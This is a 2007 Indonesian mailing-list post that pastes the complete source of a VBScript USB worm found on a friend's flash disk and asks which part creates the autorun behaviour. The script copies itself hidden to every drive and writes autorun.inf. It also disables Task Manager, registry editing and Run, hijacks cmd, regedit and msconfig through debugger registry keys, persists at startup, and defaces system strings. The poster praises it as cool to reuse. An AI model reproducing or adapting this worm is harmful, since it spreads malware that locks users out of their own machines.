[PCplus] Flashdisk autorun karena skrip vbs?

darkness night Wed, 07 Mar 2007 01:08:12 -0800

Kemarin saya dapet file vbs dari flash disk temen yang pc-nya terinfeksi
sesuatu. jadi tu pc ngopi file vbs kemana2, yang isinya hampir sama, salah
satu variannya:
=================================================
'My name is Slow but sure V1.08
on error resume next
dim rekursif,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]" & vbcrlf & "shellexecute=wscript.exe r4n694-24y.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekursif = rekursif & text.readline
rekursif = rekursif & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\r4n694-24y.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\r4n694-24y.dll.vbs",2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(winpath & "\r4n694-24y.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and
flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\r4n694-24y.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\r4n694-24y.dll.vbs",2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &"\r4n694-24y.dll.vbs")
tf.attributes = 39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf = fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Window Title","Hacked by Zay"
rg.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",
"0", "REG_DWORD"
rg.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",
"1", "REG_DWORD"
rg.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",
"1", "REG_DWORD"
rg.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",
"1", "REG_DWORD"
rg.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",
"1", "REG_DWORD"
rg.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",
"1", "REG_DWORD"
rg.regwrite"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\r4n694-24y",
winpath & "\r4n694-24y.dll.vbs"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","
notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","
notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","
notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","
notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","
notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution
Options\RegistryEditor.exe\Debugger","notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","
notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\RegisteredOrganization", "Don't Panic, System anda sudah
kami ambil alih !"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\RegisteredOwner","r4n694-24y"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run winpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
==========================================================================
varian yang lain yang saya dapet, sayang sekali karena terbiasa, langsung
saya shift+del...
tapi saya sempet coba jalanin juga, dan pada intinya dia bikin flashdisk
jadi bisa autorun!!!!!!!
keren sih, jadi bisa berkreasi.....hehehehehe....
pokonya, varian satunya itu, yang bikin IE ada keterangan Hacked by Godzilla
atau siapaaaa geto, pokoknya ada zilla-zillanya deh.....


nah, kan keren tu, jadi saya pingin tanya nih, bagian mana dari skrip yang
bisa bikin flashdisk autorun? Jadi dari my computer, jika kita klik kanan
drive flashdisknya ada pilihan autorun, keren deh......

makasih


[Non-text portions of this message have been removed]

[PCplus] Flashdisk autorun karena skrip vbs?

Kirim email ke